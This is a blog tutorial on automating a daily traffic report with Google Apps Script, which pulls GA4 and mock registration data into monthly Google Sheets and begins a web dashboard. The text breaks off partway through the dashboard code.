Previously, in the “2021 Pinkoi Tech Career Talk — Unveiling the Secrets of a Highly Efficient Engineering Team”, we discussed the cost of these small accumulations and interruptions to flow: assuming a routine, repetitive task takes 15 minutes each time and occurs 10 times a week, that alone is 15 × 10 × 52 ≈ 130 hours wasted a year; if we also count the cost of “context switching,” it can ultimately approach 200 hours a year.
2021 Pinkoi Tech Career Talk — Unveiling the Secrets of a Highly Efficient Engineering Team
Context switching means that when we are highly focused on important tasks, we need to pause to handle other matters, and the time it takes to get back into the state after handling them.
The benefit evaluation for developing RPA can refer to the figure below: as long as the total time wasted (time per occurrence × how often it occurs) exceeds the development time required, it is worth investing the resources to automate:
https://twitter.com/swyx/status/1196401158744502272
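Expressed as a quick back-of-the-envelope check (my own paraphrase of the figure's idea, using the numbers mentioned above; the function and its name are purely illustrative):

```javascript
// Is automation worth building? Compare the hours wasted over a time horizon
// against the hours needed to build the automation.
function isWorthAutomating(minutesPerOccurrence, occurrencesPerWeek, horizonWeeks, buildHours) {
  const wastedHours = (minutesPerOccurrence * occurrencesPerWeek * horizonWeeks) / 60;
  return wastedHours > buildHours;
}

// The example above: 15 minutes, 10 times a week, over a year (~130 hours),
// versus roughly one week (~40 working hours) of development time.
console.log(isWorthAutomating(15, 10, 52, 40)); // true
```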
In addition to saving time, automated standardized processes can also reduce the chance of human error and improve stability.
With the rise of AI, RPA is also mentioned frequently; but I think RPA has no direct relationship with AI. RPA existed long before the AI era, and the benefit an enterprise gets from adopting AI may not even be as high as the benefit of getting RPA right. RPA is more about corporate culture and work habits. That said, it is undeniable that AI can take RPA to the next level: where RPA used to handle only precise, routine tasks, with AI it can also take on fuzzier, more dynamic tasks that require judgment.
Google Workspace (formerly G Suite) is our daily office collaboration partner. We use Gmail for email hosting, Google Docs for documents, Google Sheets for spreadsheets, Google Forms for forms, etc. The integration between these services or communication with internal and external systems requires us to implement RPA to complete.
However, Google does not offer a dedicated RPA product; instead, this can be achieved through services such as AppSheet (No Code), Google Apps Script, or Cloud Functions.

I haven't used the No Code platform AppSheet, but I have quite a bit of experience with Cloud Functions and Google Apps Script. Here are some personal experiences and recommendations:
In summary, Cloud Functions are recommended when more comprehensive and complex RPA integration functions or more external API integration needs are required.
Previous cases using Cloud Functions include:
I use it when integrating with non-Google Workspace services and bridging other external services.
Previous cases using Google Apps Script include:
Due to execution time and API Request customization limitations, I only use Google Apps Script for simple and quick services; or when there is a need to integrate with Google services, I will prioritize using Google Apps Script (because using Cloud Functions requires implementing a complete Google service authentication process).
Finally, we come to the topic of this article, using Google Apps Script to achieve Google service RPA automation.
The product team needs to query Google Analytics data daily and fill it into the Google Sheet data report for team trend analysis; and publish the daily data content to the Dashboard screen so that all members can grasp the current situation.
Colleagues need to spend about 30 minutes to complete this task every day when they arrive at the company; if there are other things to deal with, they need to wait until this routine work is completed or delay the release of daily data messages.
A simple estimate of the RPA benefit: the manual check takes about 30 minutes every working day, which adds up to roughly 30 minutes × 5 days × 52 weeks ≈ 130 hours a year, compared with about one week of development time for the automation.

Therefore, we only need to invest one week of development time to permanently remove this routine workload from the colleague responsible for checking the data, letting them focus on more important tasks.
Our goal is to use Google Apps Script to create an RPA that automatically retrieves daily data from Google Analytics and internal system report APIs and fills it into Google Sheets, as well as setting up a Web UI Dashboard.
The data is fake, purely for demo use; from 2024/04/13 onwards, it will be particularly low or remain at 0 because my zhgchg.li GA really has “0” traffic Q_Q.
For the sake of explanation, the following code is kept as un-abstracted and as self-explanatory as possible; you can adapt it to your actual needs.
A complete public Google Sheet & Google Apps Script is attached at the end of the article. If you are too lazy to follow step by step, you can directly modify the template provided at the end.
Simply select “Extensions” -> “Apps Script” on the report we want to automate to automatically create a Google Apps Script linked to the Google Sheet report.
Alternatively, you can create a script directly from the Google Apps Script homepage, but it will not be linked to the Google Sheet.

Linking is not required in order to operate the corresponding Google Sheet; both approaches work. The difference lies in ownership of the script: if it is created from the report, it belongs to the report owner; if you create it yourself, it belongs to you. Ownership matters because the script may stop working or be deleted if the owning account is deactivated, for example after a resignation.
After creating the script, we can first rename our script project from the top.
Before moving on to the next step of writing the program, let’s supplement some basic knowledge of Google Apps Script.
About the Editor
- The SDKs for Google services are available by default (no import is required to call and use them).
- You can add multiple `.gs` files to store different objects and keep the code organized; all files execute in the same namespace and lifecycle, so be careful that duplicated object and variable names will overwrite each other.
- In addition to `.gs` script files, you can also add `.html` HTML template files for rendering a Web UI (this will be introduced later).
- 1ReeQ6WO8kKNxoaA_O0XEQ589cIrRvEBA9qcWpNqdOP17i47u6N9M5Xh0
Another point to note is indentation. In some browsers, pressing “Control + [” to indent will trigger the back page action, so be careful!
Google Apps Script GitHub Assistant Chrome Extension
Logger Message
You can use the following script with Debug to print Debug Logs in the Console.
Logger.log("Hi")
+
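As a side note (not from the original article): since Google Apps Script runs on the V8 runtime, `console.log` also works and is handy for printing structured values; a tiny sketch:

```javascript
// Both statements end up in the execution log; console.log is convenient for objects.
Logger.log("Hi");
console.log({ step: "fetchGADailyUsage", desktop: 3189, mobile: 4517 });
```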
Execution Logs and Error Information
Logs or errors during execution in the editor will be displayed directly. To check execution logs or errors during automatic execution, go to the “Executions” tab.
Automatic Triggers
The “Triggers” tab allows you to set how functions in the script are triggered automatically (for example, on a time-driven schedule or on spreadsheet events).
Error notification settings can be configured to notify you when the script execution fails.
Grant Execution Permissions
The first execution/deployment or adding new services/resources will require re-authorization. Subsequent executions will use the authorized identity, so ensure that the authorized (usually current) account has the necessary permissions for the resources/services (e.g., Google Sheet permissions).
After the account selection pop-up appears, choose the account to authorize for execution (usually the current Google Apps Script account):
The message “Google hasn’t verified this app” appears because the app we are developing is for personal use and does not need to be verified by Google.
Simply click “Advanced” -> “Go to XXX (unsafe)” -> “Allow”:
After completing the authorization, you can successfully run the script. If there are no changes to the resources, re-authorization is not required.
After understanding the basic knowledge, we can write the program for the first function.
We create the following multiple files to store different objects:
`DailyReportStyle.gs` — the field style objects:
class HeaderStyle {
+ constructor() {
+ this.color = "#ffffff";
+ this.backgroundColor = "#e3284b";
+ this.bold = false;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
+class ContentStyle {
+ constructor() {
+ this.color = "#000000";
+ this.backgroundColor = "#ffffff";
+ this.bold = false;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
+class HeaderDateStyle {
+ constructor() {
+ this.color = "#ffffff";
+ this.backgroundColor = "#001a40";
+ this.bold = true;
+ this.size = 12;
+ this.horizontalAlignment = "center";
+ this.verticalAlignment = "middle";
+ }
+}
+
`DailyReportField.gs` — the field data object:
class DailyReportField {
+ constructor(name, headerStyle, contentStyle, format = null, value = null) {
+ this.name = name;
+ this.headerStyle = headerStyle;
+ this.contentStyle = contentStyle;
+ this.format = format;
+ this.value = value;
+ }
+}
+
`DailyReport.gs` — the main report logic:
class DailyReport {
+ constructor(sheetID, date) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.date = date;
+
+ this.sheetFields = [
+ new DailyReportField("Date", new HeaderDateStyle(), new HeaderDateStyle()),
+ new DailyReportField("Day of the Week", new HeaderDateStyle(), new HeaderDateStyle()),
+ new DailyReportField("Daily Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", '=INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&4)+INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&5)'), // =4(PC Traffic) + 5(Mobile Traffic)
+ new DailyReportField("PC Traffic", new HeaderStyle(), new ContentStyle(), "#,##0"),
+ new DailyReportField("Mobile Traffic", new HeaderStyle(), new ContentStyle(), "#,##0"),
+ new DailyReportField("Registrations", new HeaderStyle(), new ContentStyle(), "#,##0")
+ ]
+
+ // Explanation of the daily traffic formula:
+ // 1. The COLUMN() function returns the column number of the current cell.
+ // 2. ADDRESS(1, COLUMN(), 4) generates an absolute reference address with the given row number (result of `COLUMN()`) and fixed column number (1). The third parameter 4 indicates a relative address without any dollar signs ($). For example, if you use this function in any cell in the third column, it will return "C1".
+ // 3. SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") removes the number 1 from the address generated by the ADDRESS function, leaving only the column letter, e.g., "C".
+ // 4. INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") & 4) here & 4 should actually be &4. The result of the `SUBSTITUTE` function is concatenated with the number 4, forming a string like "C4", and then the INDIRECT function converts this string into the corresponding cell reference. So, if you use this formula in any cell in column C, it will reference C4.
+ // 5. Similarly, `INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN(), 4), "1", "") & 5)` references the cell in the fifth row of the same column. For example, if you use this formula in any cell in column C, it will reference C5.
+ // 6. Finally, the values of the cells referenced by these two INDIRECT functions are added together.
+ }
+
+ execute() {
+ const sheet = this.getSheet();
+
+ }
+
+ // Get the target Sheet for the given date
+ getSheet() {
+ // Distinguish Sheets by month, find the current month's Sheet
+ var thisMonthSheet = this.separateSheet.getSheetByName(this.getSheetName());
+ if (thisMonthSheet == null) {
+ // If not found, create a new monthly Sheet
+ thisMonthSheet = this.makeMonthSheet();
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Monthly Sheet naming convention
+ getSheetName() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM");
+ }
+
+ // Create a new monthly Sheet
+ makeMonthSheet() {
+ // Add the current month's Sheet, move it to the first position
+ var thisMonthSheet = this.separateSheet.insertSheet(this.getSheetName(), {index: 0});
+ thisMonthSheet.activate();
+ this.separateSheet.moveActiveSheet(1);
+
+ // Add the first column, field names, set Pinned, width 200
+ thisMonthSheet.insertColumnsBefore(1, 1);
+ thisMonthSheet.setFrozenColumns(1);
+ thisMonthSheet.setColumnWidths(1, 1, 200);
+
+ // Fill in the field names
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const text = sheetField.name;
+ const style = sheetField.headerStyle;
+
+ const range = thisMonthSheet.getRange(parseInt(currentRow) + 1, 1);
+ this.setContent(range, text, style);
+ range.setHorizontalAlignment("left");
+ }
+
+ // Set row heights
+ thisMonthSheet.setRowHeights(1, Object.keys(this.sheetFields).length, 30);
+
+ // Set Pinned for the first and second rows (Date, Day of the Week)
+ thisMonthSheet.setFrozenRows(2);
+
+ // Add a summary column
+ thisMonthSheet.insertColumnsAfter(thisMonthSheet.getLastColumn(), 1); // Add one column after the last column
+ const summaryColumnIndex = thisMonthSheet.getLastColumn() + 1;
+
+ // Fill in the summary column
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const summaryRowIndex = parseInt(currentRow) + 1;
+
+ const range = thisMonthSheet.getRange(summaryRowIndex, summaryColumnIndex);
+ const style = sheetField.contentStyle;
+
+ if (summaryRowIndex == 1) {
+ // Date...
+ this.setContent(range, "Total", style);
+ } else if (summaryRowIndex == 2) {
+ // Day of the Week...merge...
+ const mergeRange = thisMonthSheet.getRange(1, summaryColumnIndex, summaryRowIndex, 1);
+ this.setContent(mergeRange, "Total", style);
+ mergeRange.merge();
+ } else {
+ this.setContent(range, '=IFERROR(SUM(INDIRECT(SUBSTITUTE(ADDRESS(1, 1, 4), "1", "") & '+summaryRowIndex+'):INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN() - 1, 4), "1", "") & '+summaryRowIndex+')), 0)', style);
+
+ // 1. The IFERROR(value, [value_if_error]) function is used to check if there is an error in the formula and return a specified value if there is an error. It takes two parameters: `value` is the expression or function to be calculated, and `value_if_error` is the value returned when value has an error. In this context, if the calculation in the SUM function has an error, it returns 0.
+ // 2. The SUM(range) function is used to calculate the sum of all numbers in the range.
+ // 3. The INDIRECT(ref_text, [is_A1_notation]) function converts a text string into a cell reference. Here, the INDIRECT function is used to dynamically generate the required reference range.
+ // 4. The SUBSTITUTE(text, old_text, new_text, [instance_num]) function replaces specified text in a text string. Here, SUBSTITUTE is used to replace the "1" in the address returned by the ADDRESS function with other content.
+ // 5. The ADDRESS(row, column, [abs_num], [a1], [sheet]) function returns the cell address corresponding to the given row and column numbers. Here, ADDRESS(1, 1, 4) generates the cell address of the first row and first column, but since abs_num is 4, the address does not include the worksheet name and fixed symbol $. Similarly, `ADDRESS(1, COLUMN() - 1, 4)` generates the cell address from the first row to the previous column of the current column.
+ // 6. The COLUMN() function returns the column number of the current cell.
+ // 7. summaryRowIndex = the row number
+ }
+ }
+
+ return thisMonthSheet;
+ }
+
+ setContent(range, text, style) {
+ if (String(text) != "") {
+ range.setValue(text);
+ }
+
+ range.setBackgroundColor(style.backgroundColor);
+ range.setFontColor(style.color);
+
+ if (style.bold) {
+ range.setFontWeight("bold");
+ }
+
+ range.setHorizontalAlignment(style.horizontalAlignment);
+ range.setVerticalAlignment(style.verticalAlignment);
+ range.setFontSize(style.size);
+ range.setBorder(true, true, true, true, true, true, "black", SpreadsheetApp.BorderStyle.SOLID);
+ }
+}
+
`Main.gs` — the main program entry point:
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE"
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+function debug() {
+ var report = new DailyReport(targetGoogleSheetID, new Date());
+ report.execute();
+}
+
After completion, we return to `Main.gs`, select “debug”, and press debug to check whether the execution result is correct and whether any errors occur.

If it runs correctly, the report will now contain the current month's sheet with the default fields and the total column; if the sheet already exists, nothing changes.
First, you need to add the “AnalyticsData” service:
Use the GA4 Debug Tool to construct query conditions:
Log in and authorize, then select the target resource:
Note down the number displayed under the property, which is the GA Property ID you want to query.
Set query parameters and Filter conditions:
Press “Make Request” to get the Response result:
You can simultaneously compare the data with the same conditions in the GA 4 backend to see if they match. If there is a significant difference, it might be because some Filter conditions were not added, so you need to check again.
A small pitfall discovered by a marketing colleague: some GA data may have delay issues, meaning the numbers you check today might be different from those you checked yesterday (e.g., bounce rate). Therefore, it’s best to backtrack the data a few days to ensure the final numbers are accurate.
After confirming that the GA Debug Tool is working correctly, we can convert it into Google Apps Script.
Add a new `GAData.gs` file:
// Remember to add Google Analytics Data API to Services, or you'll see this error: ReferenceError: AnalyticsData is not defined
+// GA Debug Tool: https://ga-dev-tools.web.app/ga4/query-explorer/
+
+class GAData {
+ constructor(date) {
+ this.date = date;
+
+ const traffic = this.fetchGADailyUsage();
+ this.pc_traffic = traffic["desktop"];
+ this.mobile_traffic = traffic["mobile"];
+ }
+
+ fetchGADailyUsage() {
+ const dimensionPlatform = AnalyticsData.newDimension();
+ dimensionPlatform.name = "deviceCategory";
+
+ const metric = AnalyticsData.newMetric();
+ metric.name = "sessions";
+
+ const dateRange = AnalyticsData.newDateRange();
+ // Default query for data within the given date range e.g. 2024-01-01 ~ 2024-01-01
+ dateRange.startDate = this.getDateString();
+ dateRange.endDate = this.getDateString();
+
+ // Filter Example:
+ // const filterExpression = AnalyticsData.newFilterExpression();
+ // const filter = AnalyticsData.newFilter();
+ // filter.fieldName = "landingPagePlusQueryString";
+ // const stringFilter = AnalyticsData.newStringFilter()
+ // stringFilter.value = "/life|/article|/chat|/house|/event/230502|/event/230310";
+ // stringFilter.matchType = "PARTIAL_REGEXP";
+ // filter.stringFilter = stringFilter;
+ // filterExpression.filter = filter;
+
+ const request = AnalyticsData.newRunReportRequest();
+ request.dimensions = [dimensionPlatform];
+ request.metrics = [metric];
+ request.dateRanges = dateRange;
+
+ // To apply the Filter Example defined above:
+ // request.dimensionFilter = filterExpression;
+ // or Not
+ // const notFilterExpression = AnalyticsData.newFilterExpression();
+ // notFilterExpression.notExpression = filterExpression;
+ // request.dimensionFilter = notFilterExpression;
+
+ const report = AnalyticsData.Properties.runReport(request, "properties/" + gaPropertyId).rows;
+ // No data
+ if (report == undefined) {
+ return {"desktop": 0, "mobile": 0};
+ }
+
+ // [{metricValues=[{value=4517}], dimensionValues=[{value=mobile}]}, {metricValues=[{value=3189}], dimensionValues=[{value=desktop}]}, {metricValues=[{value=63}], dimensionValues=[{value=tablet}]}]
+
+ var result = {};
+ report.forEach(function(element) {
+ result[element.dimensionValues[0].value] = element.metricValues[0].value;
+ });
+
+ return result;
+ }
+
+ getDateString() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM-dd");
+ }
+}
+
Add test content to `Main.gs`:
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ var report = new DailyReport(targetGoogleSheetID, new Date());
+ report.execute();
+ //
+ var gaData = new GAData(new Date());
+ Logger.log(gaData);
+}
+
Press run or debug to get the program fetch result:
OK! The comparison matches.
When this step is completed, the directory file structure is as shown above.
After creating the Sheet and checking the data, the next step is to fill in the data into the fields.
Adjust `DailyReport.gs` to add the logic for creating date columns and filling in the data by date:
class DailyReport {
+ constructor(sheetID, date, gaData, inHouseReportData) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.date = date;
+
+ const dateString = Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd");
+ const weekString = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"][date.getDay()]; // Get the day of the week, Sunday is 0, Monday is 1, and so on
+
+ this.sheetFields = [
+ new DailyReportField("Date", new HeaderDateStyle(), new HeaderDateStyle(), null, dateString),
+ new DailyReportField("Day", new HeaderDateStyle(), new HeaderDateStyle(), null, weekString),
+ new DailyReportField("Daily Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", '=INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&4)+INDIRECT(SUBSTITUTE(ADDRESS(1,COLUMN(),4),"1","")&5)'), // =4(PC Traffic) + 5(Mobile Traffic)
+ new DailyReportField("PC Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", gaData.pc_traffic),
+ new DailyReportField("Mobile Traffic", new HeaderStyle(), new ContentStyle(), "#,##0", gaData.mobile_traffic),
+ new DailyReportField("Registrations", new HeaderStyle(), new ContentStyle(), "#,##0", inHouseReportData.registers)
+ ]
+ }
+
+ execute() {
+ const sheet = this.getSheet();
+ const dateColumnIndex = this.makeOrGetDateColumn(sheet); // Get the existing update or create a new field
+
+ // Fill in the field content
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const rowIndex = parseInt(currentRow) + 1;
+
+ if (rowIndex != null) {
+ const range = sheet.getRange(rowIndex, dateColumnIndex);
+ const text = sheetField.value;
+ const style = sheetField.contentStyle;
+ this.setContent(range, text, style);
+ this.setFormat(range, sheetField.format);
+ }
+ }
+ }
+
+ // Get the target Sheet for the given date
+ getSheet() {
+ // Distinguish Sheets by month, find the current month's Sheet
+ var thisMonthSheet = this.separateSheet.getSheetByName(this.getSheetName());
+ if (thisMonthSheet == null) {
+ // If not found, create a new month Sheet
+ thisMonthSheet = this.makeMonthSheet();
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Month Sheet naming
+ getSheetName() {
+ return Utilities.formatDate(this.date, "GMT+8", "yyyy-MM");
+ }
+
+ // Create a new month Sheet
+ makeMonthSheet() {
+ // Add the current month's Sheet, move to the first position
+ var thisMonthSheet = this.separateSheet.insertSheet(this.getSheetName(), {index: 0});
+ thisMonthSheet.activate();
+ this.separateSheet.moveActiveSheet(1);
+
+ // Add the first column, field name, set Pinned, width 200
+ thisMonthSheet.insertColumnsBefore(1, 1);
+ thisMonthSheet.setFrozenColumns(1);
+ thisMonthSheet.setColumnWidths(1, 1, 200);
+
+ // Fill in the field names
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const text = sheetField.name;
+ const style = sheetField.headerStyle;
+
+ const range = thisMonthSheet.getRange(parseInt(currentRow) + 1, 1);
+ this.setContent(range, text, style);
+ range.setHorizontalAlignment("left");
+ }
+
+ // Set row height
+ thisMonthSheet.setRowHeights(1, Object.keys(this.sheetFields).length, 30);
+
+ // Set Pinned for the first and second rows (Date, Day)
+ thisMonthSheet.setFrozenRows(2);
+
+ // Add total field
+ thisMonthSheet.insertColumnsAfter(thisMonthSheet.getLastColumn(), 1); // Add a column after the last column
+ const summaryColumnIndex = thisMonthSheet.getLastColumn() + 1;
+
+ // Fill in the total field
+ for(const currentRow in this.sheetFields) {
+ const sheetField = this.sheetFields[currentRow];
+ const summaryRowIndex = parseInt(currentRow) + 1;
+
+ const range = thisMonthSheet.getRange(summaryRowIndex, summaryColumnIndex);
+ const style = sheetField.contentStyle;
+
+ if (summaryRowIndex == 1) {
+ // Date...
+ this.setContent(range, "Total", style);
+ } else if (summaryRowIndex == 2) {
+ // Day...merge...
+ const mergeRange = thisMonthSheet.getRange(1, summaryColumnIndex, summaryRowIndex, 1);
+ this.setContent(mergeRange, "Total", style);
+ mergeRange.merge();
+ } else {
+ this.setContent(range, '=IFERROR(SUM(INDIRECT(SUBSTITUTE(ADDRESS(1, 1, 4), "1", "") & '+summaryRowIndex+'):INDIRECT(SUBSTITUTE(ADDRESS(1, COLUMN() - 1, 4), "1", "") & '+summaryRowIndex+')), 0)', style);
+ }
+ }
+
+ return thisMonthSheet;
+ }
+
+ // Create or get the date field
+ // Add a field from the most recent day
+ makeOrGetDateColumn(sheet) {
+ const firstRowColumnsRange = sheet.getRange(1, 1, 1, sheet.getLastColumn()); // Get the data range of the first row (date)
+ const firstRowColumns = firstRowColumnsRange.getValues()[0]; // Get the values of the data range, 0 = first row
+
+ var columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(this.date, "GMT+8", "yyyy/MM/dd"))); // Find the index of the corresponding date field
+
+ if (columnIndex < 0) {
+ // Not Found, find the position of the previous day
+ var preDate = new Date(this.date);
+ preDate.setDate(preDate.getDate() - 1);
+
+ while(preDate.getMonth() == this.date.getMonth()) {
+ columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(preDate, "GMT+8", "yyyy/MM/dd")));
+ if (columnIndex >= 0) {
+ break;
+ }
+
+ preDate.setDate(preDate.getDate() - 1);
+ }
+
+ if (columnIndex >= 0) {
+ columnIndex += 1;
+ sheet.insertColumnsAfter(columnIndex, 1); // Add a column after the previous day's field
+ columnIndex += 1;
+ }
+ } else {
+ columnIndex += 1;
+ }
+
+ if (columnIndex < 0) {
+ sheet.insertColumnsAfter(1, 1); // Default, directly add a column after the first column
+ columnIndex = 2;
+ }
+
+ // Set column width
+ sheet.setColumnWidths(columnIndex , 1, 100);
+
+ return columnIndex
+ }
+
+ // Set field format style
+ setFormat(range, format) {
+ if (format != null) {
+ range.setNumberFormat(format);
+ }
+ }
+
+ // Fill content into the field
+ setContent(range, text, style) {
+ if (String(text) != "") {
+ range.setValue(text);
+ }
+
+ range.setBackgroundColor(style.backgroundColor);
+ range.setFontColor(style.color);
+
+ if (style.bold) {
+ range.setFontWeight("bold");
+ }
+
+ range.setHorizontalAlignment(style.horizontalAlignment);
+ range.setVerticalAlignment(style.verticalAlignment);
+ range.setFontSize(style.size);
+ range.setBorder(true, true, true, true, true, true, "black", SpreadsheetApp.BorderStyle.SOLID);
+ }
+}
+
Adjust `Main.gs` to integrate the data sources and pass the values in when constructing the report:
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ const date = new Date();
+ const gaData = new GAData(date);
+ const inHouseReportData = fetchInHouseReportData(date);
+
+ const report = new DailyReport(targetGoogleSheetID, date, gaData, inHouseReportData);
+ report.execute();
+
+}
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
After completion, go back to `Main.gs`, select `debug`, and press debug to check whether the execution result is correct and whether any errors occur.
Back to Google Sheet! Success! We have successfully added the data for the date automatically.
After completing the script, we just need to set up an automatic trigger so that it runs by itself every day.
Adjust `Main.gs` to add the `cronjob()` function:
const targetGoogleSheetID = "1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE";
+// https://docs.google.com/spreadsheets/d/1-9lZCpsu3E7eDmO-lMkXJXQ6Y6KK4SiyU6uBODcDcFE/edit#gid=275710641
+
+const gaPropertyId = "318495208";
+
+function debug() {
+ cronjob();
+}
+
+// In reality, we usually check yesterday's data today so that the numbers for the day are complete.
+function cronjob() {
+ const yesterday = new Date();
+ yesterday.setDate(yesterday.getDate() - 1);
+
+ const gaData = new GAData(yesterday);
+ const inHouseReportData = fetchInHouseReportData(yesterday);
+
+ const report = new DailyReport(targetGoogleSheetID, yesterday, gaData, inHouseReportData);
+ report.execute();
+}
+
+// Simulate some data that might be obtained by hitting other platform APIs.
+function fetchInHouseReportData(date) {
+ // EXAMPLE REQUEST:
+ // var options = {
+ // 'method' : 'get',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // }
+ // };
+ // OR
+ // var options = {
+ // 'method' : 'post',
+ // 'headers': {
+ // 'Authorization': 'Bearer XXX'
+ // },
+ // 'payload' : data
+ // };
+
+ // var res = UrlFetchApp.fetch(url, options);
+ // const result = JSON.parse(res.getContentText());
+
+ // REMEMBER, DUE TO SECURITY REASON, We can't customize user-agent.
+
+ return {"registers": Math.floor(Math.random() * (180 - 30 + 1)) + 30} // MOCK DATA random 30~180
+}
+
Switch to the “Triggers” tab in the editor and select “Add Trigger” in the bottom-right corner.

Choose `cronjob` in `Main.gs` as the function to run, set the event source to a daily time-driven schedule, save the settings, and you’re done.
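If you prefer to create the trigger in code rather than through the UI, a minimal sketch using the built-in `ScriptApp` service could look like the following (the `setupDailyTrigger` function name and the 9 AM run hour are my own choices, not part of the original setup):

```javascript
// Run this function once manually to register a daily time-driven trigger for cronjob().
function setupDailyTrigger() {
  // Remove any existing triggers that already point at cronjob() to avoid duplicates.
  ScriptApp.getProjectTriggers()
    .filter((trigger) => trigger.getHandlerFunction() === "cronjob")
    .forEach((trigger) => ScriptApp.deleteTrigger(trigger));

  // Schedule cronjob() to run once a day, at roughly 9 AM in the script's time zone.
  ScriptApp.newTrigger("cronjob")
    .timeBased()
    .everyDays(1)
    .atHour(9)
    .create();
}
```

Either way, the registered trigger shows up in the same “Triggers” tab.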
You can then go to the “Executions” tab to check the execution record results:
At this point, we have completed the RPA function for automating queries, adding data, and filling in data reports. 🎉🎉🎉
Next, there is a secondary requirement. We need to create a simple web display of daily data (similar to a war room concept) that will be directly displayed on a large screen on the wall behind the team.
The effect is as shown below:
Add `Web_DailyReport.gs` to read the Google Sheet and convert the columns and styles into HTML for display:
class WebDailyReport {
+ constructor(sheetID, dayCount) {
+ this.separateSheet = SpreadsheetApp.openById(sheetID);
+ this.dayCount = dayCount;
+ this.sheetRows = [
+ "Date",
+ "Day of the Week",
+ "Daily Traffic",
+ "PC Traffic",
+ "Mobile Traffic",
+ "Registration Count"
+ ];
+ }
+
+ allData(startDate) {
+ var sheetRowsIndexs = {};
+ var count = this.dayCount;
+ var result = [];
+ while (count >= 0) {
+ const preDate = new Date(startDate);
+ preDate.setDate(preDate.getDate() - (this.dayCount - count));
+ const sheetName = Utilities.formatDate(preDate, "GMT+8", "yyyy-MM");
+ const targetSheet = this.separateSheet.getSheetByName(sheetName);
+ if (targetSheet != null) {
+ const firstRowColumnsRange = targetSheet.getRange(1, 1, 1, targetSheet.getLastColumn()); // Get the range of the first row (date)
+ const firstRowColumns = firstRowColumnsRange.getValues()[0]; // Get the values of the range, 0 = first row
+ var columnIndex = firstRowColumns.findIndex((date) => (date instanceof Date && Utilities.formatDate(date, "GMT+8", "yyyy/MM/dd") == Utilities.formatDate(preDate, "GMT+8", "yyyy/MM/dd"))); // Find the index of the corresponding date column
+
+ if (columnIndex >= 0) {
+ columnIndex = parseInt(columnIndex) + 1;
+ if (sheetRowsIndexs[sheetName] == undefined || sheetRowsIndexs[sheetName] == null) {
+ sheetRowsIndexs[sheetName] = this.sheetRows.map((sheetRow) => this.getFieldRow(targetSheet, sheetRow));
+ }
+
+ if (result.length == 0) {
+ // Add the first column
+ const ranges = sheetRowsIndexs[sheetName].map((rowIndex) => (rowIndex != null) ? (targetSheet.getRange(rowIndex, 1)) : (null));
+ result.push(this.makeValues(ranges));
+ }
+
+ const ranges = sheetRowsIndexs[sheetName].map((rowIndex) => (rowIndex != null) ? (targetSheet.getRange(rowIndex, columnIndex)) : (null));
+ result.push(this.makeValues(ranges));
+ }
+ }
+
+ count -= 1;
+ }
+
+ var transformResult = {};
+ for (const columnIndex in result) {
+ for (const rowIndex in result[columnIndex]) {
+ if (transformResult[rowIndex] == undefined) {
+ transformResult[rowIndex] = [];
+ }
+
